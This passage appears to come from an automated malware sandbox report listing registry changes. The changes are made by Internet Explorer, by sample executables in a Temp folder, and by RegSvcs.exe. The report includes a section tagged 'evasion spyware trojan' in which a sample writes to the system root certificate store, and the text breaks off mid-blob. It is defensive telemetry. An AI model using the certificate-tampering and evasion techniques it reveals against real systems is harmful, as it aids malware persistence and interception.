Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403735099" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{89C0E4E1-67AC-11EE-A354-7AA063A69366} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30529061b9fbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002bccc567d90a0b479b49b1b2d43318c3000000000200000000001066000000010000200000004f6cbce9eaaefc13b7ec4618c065ce23847559c9a41471ccef0a34d8e2ee97b4000000000e8000000002000020000000a56b31c667dcce3c9a69fa8509e5ea343b95db05ebc47d14f140c79d71f087d1900000003c3a9c87cd0016aabd3f2bb6ad002b0a44df61da7cf1fdb945c9492b8f8a9fb0a2dbda58e53f8cf6261f1243ce81fb695e81cd6125dc3ff374111476f021021efb06aa360f7b479941a6d8b8606df1015eee5fecfff4283da1ba25131a77062c2b533afd81087bdbf6c771df606396f2ac5889e5fd7f7d553f6ecb187389dd38f72cb8238b3e6bf67d704fcad95e2560400000009008b27ab889c3ce291fe972e65e655edd8ad31c6b323a338d31aca28bef9b2fe156abdf566ca7f9b6850ac9be141b1695025d734cd39885e27c132f504a92e2 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{89D222F1-67AC-11EE-A354-7AA063A69366} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a1